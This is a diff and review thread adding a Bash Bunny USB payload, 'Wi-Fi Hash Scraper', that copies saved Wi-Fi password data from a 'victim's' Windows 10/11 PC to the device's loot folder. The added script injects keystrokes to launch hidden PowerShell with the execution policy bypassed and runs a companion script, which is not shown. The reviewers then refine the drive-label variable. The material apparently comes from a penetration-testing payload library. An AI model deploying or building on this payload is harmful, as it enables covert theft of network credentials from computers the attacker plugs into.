payloads/library/recon/WiFi-Hash-Scraper/payload.txt

```diff
@@ -0,0 +1,22 @@
+#!/bin/bash
+#
+# Title:            Wi-Fi Hash Scraper
+#
+# Description:      
+# 			  Copies all of the known / saved WiFi password hashes from the victim's PC to the BashBunny's loot folder.
+#
+# Author:           KryptoKola
+# Version:          1.0
+# Category:         Recon
+# Target:           Microsoft Windows 10 & 11
+
+ATTACKMODE HID STORAGE
+
+LED SETUP
+GET SWITCH_POSITION
+LED ATTACK
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel 'BashBunny').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
```

Comment:
RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel '${BB_LABEL}').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"

Reply:
I have made this change per your request --- thank you!

Reply:
Don't forget to add the GET BB_LABEL in the setup to initialize the variable

Reply:
I just made this change. Thank you!